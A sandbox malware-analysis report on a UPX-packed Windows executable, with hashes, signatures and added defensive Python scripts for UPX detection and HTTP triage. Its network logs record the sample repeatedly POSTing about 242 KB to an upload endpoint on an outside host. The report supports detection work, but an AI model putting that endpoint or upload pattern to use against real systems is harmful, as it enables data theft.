Analysis

  • max time kernel
    92s
  • max time network
    95s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64
    arch:x86
    image:win7-20240903-en
    locale:en-us
    os:windows7-x64
    system
  • submitted
    13/10/2024, 18:07 UTC

General

  • Target

    9048bfe7b28bff2166df471d154da8c1d8cc04e132854c8d89c42ef8431c0721N.exe

  • Size

    236KB

  • MD5

    a2e7e82983f710a72ea5e49e9efeb8d0

  • SHA1

    d7b90a99aca0e3efe942743e0418f57d7d7eeb61

  • SHA256

    9048bfe7b28bff2166df471d154da8c1d8cc04e132854c8d89c42ef8431c0721

  • SHA512

    4da533d8822978e0a9f26ae9bb2b2a7a46994a353a52dea0d49117adb60b374fabc90d07b484c458f286ad84dea0ac6794c1edc83ff68e9a232179b999c95b2a

  • SSDEEP

    3072:7J0Bs3o8A4M3riN6MhGkgS3PL6pb9t16n5OkhBOPC/P/FnncroP9:9wDeM7iNEkgiOb31k1ECvJ/F

Score
5/10

Malware Config

Signatures

  • UPX packed file 3 IoCs

    Detects executables packed with the open-source UPX packer or a modified UPX build.

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempts to gather information about the system language of the victim host in order to infer its geographical location (ATT&CK T1614.001).
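How the evidence behind the "UPX packed file" signature can be reproduced offline, as an added example that is not tria.ge's detection code: a small Python PE section-table parser checks for the UPX0/UPX1 section names, the `UPX!` pack-header magic, and the stock UPX layout (an empty first section with the entry point in a later section). The two PE images it runs on are constructed header-only blobs produced by the hypothetical `build_pe` helper, not the sample from this report, and the two-indicator threshold in `is_upx_packed` is an assumption of this example.

```python
"""Static check for the indicators behind a "UPX packed file" verdict (added example)."""
import struct

UPX_SECTION_NAMES = {b"UPX0", b"UPX1", b"UPX2"}


def pe_sections(data: bytes) -> list:
    """Return (name, VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData) per section."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not a PE file: missing MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file: missing PE signature")
    coff = e_lfanew + 4                       # IMAGE_FILE_HEADER, 20 bytes
    num_sections = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    table = coff + 20 + opt_size              # section table follows the optional header
    out = []
    for i in range(num_sections):
        off = table + 40 * i                  # each IMAGE_SECTION_HEADER is 40 bytes
        name = data[off:off + 8].rstrip(b"\0")
        vsize, vaddr, rsize, rptr = struct.unpack_from("<IIII", data, off + 8)
        out.append((name, vsize, vaddr, rsize, rptr))
    return out


def entry_point_rva(data: bytes) -> int:
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    opt = e_lfanew + 4 + 20                   # AddressOfEntryPoint is at +16 for PE32 and PE32+
    return struct.unpack_from("<I", data, opt + 16)[0]


def upx_indicators(data: bytes) -> list:
    """Return the UPX indicators found; an empty list means no evidence of UPX."""
    reasons = []
    sections = pe_sections(data)
    upx_names = sorted(n.decode() for n, *_ in sections if n in UPX_SECTION_NAMES)
    if upx_names:
        reasons.append("UPX section names: " + ", ".join(upx_names))
    if b"UPX!" in data:                       # PackHeader magic, present in stock UPX output
        reasons.append("UPX! pack-header magic present")
    if sections:
        # Stock UPX layout: the first section (UPX0) is the empty unpack area and the
        # entry point sits in a later section (UPX1). This survives section renaming.
        first = sections[0]
        ep = entry_point_rva(data)
        ep_section = next((s for s in sections if s[2] <= ep < s[2] + max(s[1], s[3])), None)
        if first[3] == 0 and first[1] > 0 and ep_section is not None and ep_section is not first:
            reasons.append("empty first section with entry point in later section "
                           + ep_section[0].decode(errors="replace"))
    return reasons


def is_upx_packed(data: bytes) -> bool:
    return len(upx_indicators(data)) >= 2     # assumed threshold: two independent indicators


def build_pe(sections, entry_point: int, trailer: bytes = b"") -> bytes:
    """Construct a header-only PE32 image for testing (constructed input, not loadable)."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0xE0, 0x102)
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)     # PE32 magic
    struct.pack_into("<I", opt, 16, entry_point)
    table = b"".join(struct.pack("<8sIIIIIIHHI", name, vsize, vaddr, rsize, rptr, 0, 0, 0, 0, flags)
                     for name, vsize, vaddr, rsize, rptr, flags in sections)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + table + trailer


# Constructed samples: a stock-UPX-style layout and a plain compiler layout.
PACKED_SAMPLE = build_pe(
    [(b"UPX0", 0x2000, 0x1000, 0, 0x400, 0xE0000080),
     (b"UPX1", 0x1000, 0x3000, 0x800, 0x400, 0xE0000040),
     (b".rsrc", 0x200, 0x4000, 0x200, 0xC00, 0xC0000040)],
    entry_point=0x3500, trailer=b"\0" * 16 + b"UPX!" + b"\0" * 8)
CLEAN_SAMPLE = build_pe(
    [(b".text", 0x1000, 0x1000, 0x1000, 0x400, 0x60000020),
     (b".data", 0x200, 0x2000, 0x200, 0x1400, 0xC0000040)],
    entry_point=0x1200)

if __name__ == "__main__":
    for label, blob in (("packed", PACKED_SAMPLE), ("clean", CLEAN_SAMPLE)):
        print(label, is_upx_packed(blob), upx_indicators(blob))
```

A build with renamed sections and the magic scrubbed (the "modified UPX" case the signature mentions) still trips the layout check, so that is the indicator worth keeping when the name list and `UPX!` string give nothing; run the real sample through `upx_indicators` and read the reasons rather than relying on the bare verdict.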

Processes

  • C:\Users\Admin\AppData\Local\Temp\9048bfe7b28bff2166df471d154da8c1d8cc04e132854c8d89c42ef8431c0721N.exe
    "C:\Users\Admin\AppData\Local\Temp\9048bfe7b28bff2166df471d154da8c1d8cc04e132854c8d89c42ef8431c0721N.exe"
    PID: 3052
    • System Location Discovery: System Language Discovery

Network

  • flag-us
    DNS
    wecan.hasthe.technology
    9048bfe7b28bff2166df471d154da8c1d8cc04e132854c8d89c42ef8431c0721N.exe
    Remote address:
    8.8.8.8:53
    Request
    wecan.hasthe.technology
    IN A
    Response
    wecan.hasthe.technology
    IN A
    104.21.59.199
    wecan.hasthe.technology
    IN A
    172.67.183.40
  • flag-us
    POST
    http://wecan.hasthe.technology/upload
    9048bfe7b28bff2166df471d154da8c1d8cc04e132854c8d89c42ef8431c0721N.exe
    Remote address:
    104.21.59.199:80
    Request
    POST /upload HTTP/1.1
    Host: wecan.hasthe.technology
    Accept: */*
    Content-Length: 242084
    Expect: 100-continue
    Content-Type: multipart/form-data; boundary=------------------------291b2378a72a171e
    Response
    HTTP/1.1 301 Moved Permanently
    Date: Sun, 13 Oct 2024 18:08:25 GMT
    Content-Type: text/html
    Content-Length: 167
    Connection: keep-alive
    Cache-Control: max-age=3600
    Expires: Sun, 13 Oct 2024 19:08:25 GMT
    Location: https://computernewb.com/collab-vm/
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=m9%2BLjf7LBpUB6BRB98uE7X7jy%2BLR7MQKRBvPFXKtLN7vVK66n3vEWaBSHDPV6bJtYYjeOe4BpTyA3O7XphNDnuBzRf0xmfD%2BBtnC%2BTeZL37VkDIFgMwmHz%2Fuv%2BlEO%2FrCqVjszBk0OIarmA%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8d21465a0ba894d2-LHR
  • flag-us
    POST
    http://wecan.hasthe.technology/upload
    9048bfe7b28bff2166df471d154da8c1d8cc04e132854c8d89c42ef8431c0721N.exe
    Remote address:
    104.21.59.199:80
    Request
    POST /upload HTTP/1.1
    Host: wecan.hasthe.technology
    Accept: */*
    Content-Length: 242084
    Expect: 100-continue
    Content-Type: multipart/form-data; boundary=------------------------309121f5eab85c91
    Response
    HTTP/1.1 301 Moved Permanently
    Date: Sun, 13 Oct 2024 18:08:55 GMT
    Content-Type: text/html
    Content-Length: 167
    Connection: keep-alive
    Cache-Control: max-age=3600
    Expires: Sun, 13 Oct 2024 19:08:55 GMT
    Location: https://computernewb.com/collab-vm/
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OlPIlML5sxHIOPIMibeuPpsuedRiuXOPiNjXJiwzkge5oyysa2vDEZz2xiND1iHENcocmHPmPrDBCY5l2pkCo134Zy7O2qwvBWoAXLFNJkYJ8tVP3j%2FqfUacmJQss%2BHjTHoDABglDHWIeQ%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8d2147198972cd31-LHR
  • flag-us
    POST
    http://wecan.hasthe.technology/upload
    9048bfe7b28bff2166df471d154da8c1d8cc04e132854c8d89c42ef8431c0721N.exe
    Remote address:
    104.21.59.199:80
    Request
    POST /upload HTTP/1.1
    Host: wecan.hasthe.technology
    Accept: */*
    Content-Length: 242084
    Expect: 100-continue
    Content-Type: multipart/form-data; boundary=------------------------3bf7de660bf68b58
    Response
    HTTP/1.1 301 Moved Permanently
    Date: Sun, 13 Oct 2024 18:09:26 GMT
    Content-Type: text/html
    Content-Length: 167
    Connection: keep-alive
    Cache-Control: max-age=3600
    Expires: Sun, 13 Oct 2024 19:09:26 GMT
    Location: https://computernewb.com/collab-vm/
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BvJMhUnoGJp644pMyJ9eFvNB0vD5ESPWpzAmuDyqHMnjUYIN5gPtzrhPW%2FWF9QwqJzxsVvi2nVmsMHs4Qb8NGQYeKJKClbdyC5CIJdd7fgegMsepLTQW4OV9tDduiCV9%2BpwwBgj59YK%2FzA%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8d2147d93e5a955d-LHR
  • 104.21.59.199:80
    URL: http://wecan.hasthe.technology/upload
    Protocol: http
    Process: 9048bfe7b28bff2166df471d154da8c1d8cc04e132854c8d89c42ef8431c0721N.exe
    Sent: 250.2kB (198 packets)
    Received: 5.9kB (125 packets)
    HTTP Request: POST http://wecan.hasthe.technology/upload
    HTTP Response: 301
  • 104.21.59.199:80
    URL: http://wecan.hasthe.technology/upload
    Protocol: http
    Process: 9048bfe7b28bff2166df471d154da8c1d8cc04e132854c8d89c42ef8431c0721N.exe
    Sent: 250.2kB (198 packets)
    Received: 5.4kB (115 packets)
    HTTP Request: POST http://wecan.hasthe.technology/upload
    HTTP Response: 301
  • 104.21.59.199:80
    URL: http://wecan.hasthe.technology/upload
    Protocol: http
    Process: 9048bfe7b28bff2166df471d154da8c1d8cc04e132854c8d89c42ef8431c0721N.exe
    Sent: 250.2kB (198 packets)
    Received: 5.9kB (126 packets)
    HTTP Request: POST http://wecan.hasthe.technology/upload
    HTTP Response: 301
  • 8.8.8.8:53
    Host: wecan.hasthe.technology
    Protocol: dns
    Process: 9048bfe7b28bff2166df471d154da8c1d8cc04e132854c8d89c42ef8431c0721N.exe
    Sent: 69 B (1 packet)
    Received: 101 B (1 packet)
    DNS Request: wecan.hasthe.technology
    DNS Response: 104.21.59.199, 172.67.183.40
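The three POST /upload exchanges above, turned into a triage script as an added example that is not part of the report or of tria.ge: it parses a constructed header transcript modelled on those exchanges (trimmed to the fields used; the report does not contain the multipart bodies), lists the contacted host and IP, derives the retry cadence from the response Date headers, and records whether any response was a 2xx. The transcript format with `### remote` separators and the `plausible_self_upload` heuristic are assumptions of this example, not tria.ge signatures.

```python
"""Triage cleartext HTTP exchanges from a sandbox run (added example)."""
from email.utils import parsedate_to_datetime
from urllib.parse import urlsplit

# Constructed transcript modelled on the report's three POST /upload exchanges;
# "### <remote>" starts a transaction, a blank line separates request from response.
TRANSCRIPT = """\
### 104.21.59.199:80
POST /upload HTTP/1.1
Host: wecan.hasthe.technology
Content-Length: 242084
Expect: 100-continue
Content-Type: multipart/form-data; boundary=------------------------291b2378a72a171e

HTTP/1.1 301 Moved Permanently
Date: Sun, 13 Oct 2024 18:08:25 GMT
Location: https://computernewb.com/collab-vm/
Server: cloudflare

### 104.21.59.199:80
POST /upload HTTP/1.1
Host: wecan.hasthe.technology
Content-Length: 242084
Expect: 100-continue
Content-Type: multipart/form-data; boundary=------------------------309121f5eab85c91

HTTP/1.1 301 Moved Permanently
Date: Sun, 13 Oct 2024 18:08:55 GMT
Location: https://computernewb.com/collab-vm/
Server: cloudflare

### 104.21.59.199:80
POST /upload HTTP/1.1
Host: wecan.hasthe.technology
Content-Length: 242084
Expect: 100-continue
Content-Type: multipart/form-data; boundary=------------------------3bf7de660bf68b58

HTTP/1.1 301 Moved Permanently
Date: Sun, 13 Oct 2024 18:09:26 GMT
Location: https://computernewb.com/collab-vm/
Server: cloudflare
"""


def parse_message(block: str) -> dict:
    """Split an HTTP start line from its headers; header names are lower-cased."""
    lines = block.strip().splitlines()
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"start": lines[0], "headers": headers}


def parse_transcript(text: str) -> list:
    txns = []
    for chunk in text.split("### ")[1:]:
        remote, _, body = chunk.partition("\n")
        req, _, resp = body.partition("\n\n")
        txns.append({"remote": remote.strip(),
                     "request": parse_message(req), "response": parse_message(resp)})
    return txns


def triage(txns: list) -> dict:
    statuses = [int(t["response"]["start"].split()[1]) for t in txns]
    dates = [parsedate_to_datetime(t["response"]["headers"]["date"]) for t in txns]
    uploads = [t for t in txns if t["request"]["start"].startswith("POST ")
               and t["request"]["headers"].get("content-type", "").startswith("multipart/form-data")]
    return {
        "ioc_hosts": sorted({t["request"]["headers"]["host"] for t in txns}),
        "ioc_ips": sorted({t["remote"].rsplit(":", 1)[0] for t in txns}),
        "statuses": statuses,
        "accepted": any(200 <= s < 300 for s in statuses),   # did any upload get a 2xx?
        "upload_bytes": [int(t["request"]["headers"]["content-length"]) for t in uploads],
        "retry_intervals_s": [round((b - a).total_seconds()) for a, b in zip(dates, dates[1:])],
        # A Location header says where the edge sent the client, not where the sample wanted
        # to go; keep it separate and do not promote it to an IoC without further evidence.
        "redirect_domains": sorted({urlsplit(t["response"]["headers"]["location"]).netloc
                                    for t in txns if "location" in t["response"]["headers"]}),
    }


def plausible_self_upload(content_length: int, file_size: int, max_overhead: int = 4096) -> bool:
    """Assumed heuristic: a multipart body only slightly larger than a file suggests that file is the payload."""
    return 0 <= content_length - file_size <= max_overhead


if __name__ == "__main__":
    for key, value in triage(parse_transcript(TRANSCRIPT)).items():
        print(f"{key}: {value}")
```

On the report's data the three responses are all 301s roughly 30 s apart, so nothing in-band shows the server ingested the 242084-byte body; the per-connection summary still records about 250 kB sent each time, so the body went out even though the only response to the Expect: 100-continue request is the redirect. The Location target is a Cloudflare-served redirect, which is why the script reports it apart from the IoC list.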

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Temp\rifaien2-D6qLMY88FQENYiVV.exe

    Filesize

    236KB

    MD5

    1114398207d2f1634685495e2c4c638d

    SHA1

    8e6d836c92740e3c96ff19308395701ff4ab77f8

    SHA256

    587a0ae1bca2edd9eef1a7a1d7255c789b01223d2231067e1259909d1e6698bf

    SHA512

    1a824d504e87a04d03586335a02a270c82e47d8bb2a36c5dd65d468d509f31e0dfbe00b87c4428910f34eacfa365277a545e0cfb5d6b48f18422c650a79e9f70

  • memory/3052-0-0x0000000000400000-0x000000000043B000-memory.dmp

    Filesize

    236KB

  • memory/3052-1-0x0000000000400000-0x000000000043B000-memory.dmp

    Filesize

    236KB
